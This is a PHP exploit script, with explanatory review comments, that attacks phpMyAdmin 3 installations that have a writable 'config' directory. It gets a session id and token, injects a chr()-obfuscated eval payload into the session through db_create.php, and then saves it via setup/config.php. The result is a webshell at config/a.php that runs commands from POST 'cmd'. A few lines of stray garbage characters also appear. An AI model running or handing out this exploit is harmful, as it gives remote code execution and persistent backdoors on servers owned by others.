/**
 * Works only when the directory "config" exists on the target and is
 * writeable by the web server; removing that directory (or making it
 * read-only) after setup is what defeats this script.
 */
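// Usage check: the script needs a target host and the path under which
// phpMyAdmin is served. Exit non-zero so shell callers can detect misuse.
if ($argc < 3) {
    echo '
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
';
    exit(1);
}

$host = $argv[1];
// Normalise the path so it always starts and ends with "/". php_request()
// concatenates it directly with a relative file name, so "/pma" without the
// trailing slash would otherwise produce requests for "/pmaconfig/" etc.
// "/" and "" both normalise to "/".
$path = '/' . ltrim(rtrim($argv[2], '/') . '/', '/');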
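/**
 * Step 1: check that the "config" directory is present on the target.
 * The later steps depend on this directory, so a missing directory means the
 * script cannot succeed and there is no point continuing.
 */
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr = php_request('config/');
// Inspect the HTTP status line only. A plain substring search for "404"
// would also trip on a Content-Length, a session id or any body text that
// happens to contain those three digits, and would silently carry on when
// the target returned nothing at all.
if (!preg_match('#^HTTP/1\.[01] (\d{3})#', $returnstr, $status)) {
    exit("[-] Exploit Failed! No valid HTTP response from $host\n");
}
if ($status[1] === '404') {
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Step 2: obtain the phpMyAdmin session id and the per-session token from
 * index.php; both are required by the requests that follow.
 */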
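echo "[+] Try to get token and sessionid....\n";
$result = php_request('index.php');
// The session id is taken from a "phpMyAdmin=<id>;" fragment in the raw
// response (presumably the Set-Cookie header) and the token from a
// "token=<32 hex/word chars>&" fragment that follows it in the body.
$resp = array();
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
// Guard the captures: on a failed match $resp is empty and indexing it
// directly raises an undefined-index notice.
$sessionid = isset($resp[1]) ? $resp[1] : '';
$token     = isset($resp[3]) ? $resp[3] : '';
if ($token !== '' && $sessionid !== '') {
    // Print the actual values (the original output had lost the variable
    // interpolation and only printed the labels), so a failure in a later
    // step can be diagnosed against the server's session.
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
} else {
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}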
/**
 * Step 3: try to insert the shell payload into the server-side session.
 */
echo "[+] Try to insert shell into session....\n";
// GET db_create.php with the session cookie and a _SESSION[...] parameter.
// The array key carries a chr()-obfuscated PHP fragment wrapped in "*/ ... /*"
// comment delimiters. NOTE(review): this is the remote-code-execution payload;
// judging by the success check below it is expected to produce config/a.php.
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);
// Actually, almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell: POST to setup/config.php with submit_save so the
 * configuration held in the session is written out (the check that follows
 * reads config/config.inc.php, so that is presumably the file produced).
 */
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
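/**
 * Try to check if the webshell was created successfully: the marker string
 * "t00ls" from the injected session value should now be present in
 * config/config.inc.php on the target.
 */
echo "[+] Try to check if the webshell was created successfully....\n";
$content = php_request('config/config.inc.php');
// strpos() returns 0 for a match at offset 0, so compare against false
// explicitly rather than relying on truthiness.
if (strpos($content, 't00ls') !== false) {
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
} else {
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}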
3 X: ?1 ?* v% S) d: ~# Z- j
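/**
 * Send one HTTP/1.1 request to the global $host on port 80 and return the
 * raw response, status line and headers included.
 *
 * @param string $url    path relative to the global $path prefix
 * @param string $data   form-encoded body; non-empty selects POST, empty GET
 * @param string $cookie raw Cookie header value, sent only when non-empty
 * @return string        everything read from the socket until EOF
 *
 * Prints a message and dies when the connection cannot be opened.
 */
function php_request($url, $data = '', $cookie = '') {
    global $host, $path;

    $has_body = ($data !== '' && $data !== null);
    $method = $has_body ? 'POST' : 'GET';

    // Header order matches the original hand-built packet.
    $headers = array(
        "$method {$path}{$url} HTTP/1.1",
        'Accept: */*',
        'User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
        "Host: $host",
    );
    if ($has_body) {
        $headers[] = 'Content-Type: application/x-www-form-urlencoded';
        // strlen() counts bytes, which is what Content-Length requires.
        $headers[] = 'Content-Length: ' . strlen($data);
    }
    if ($cookie !== '' && $cookie !== null) {
        $headers[] = "Cookie: $cookie";
    }
    $headers[] = 'Connection: Close';

    $packet = implode("\r\n", $headers) . "\r\n\r\n";
    if ($has_body) {
        $packet .= $data;
    }

    // Use an explicit connect timeout and capture the failure reason; the
    // original relied on the default timeout and reported no cause.
    $errno = 0;
    $errstr = '';
    $fp = @fsockopen(gethostbyname($host), 80, $errno, $errstr, 10);
    if (!$fp) {
        echo 'No response from ' . $host . ($errstr !== '' ? ": $errstr" : '');
        die;
    }
    fputs($fp, $packet);

    $resp = '';
    while (!feof($fp)) {
        $chunk = fread($fp, 1024);
        if ($chunk === false) {
            break;
        }
        $resp .= $chunk;
    }
    // The original never closed the socket; release it explicitly.
    fclose($fp);

    return $resp;
}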
?> ) a' A# n6 y$ T2 H+ L
.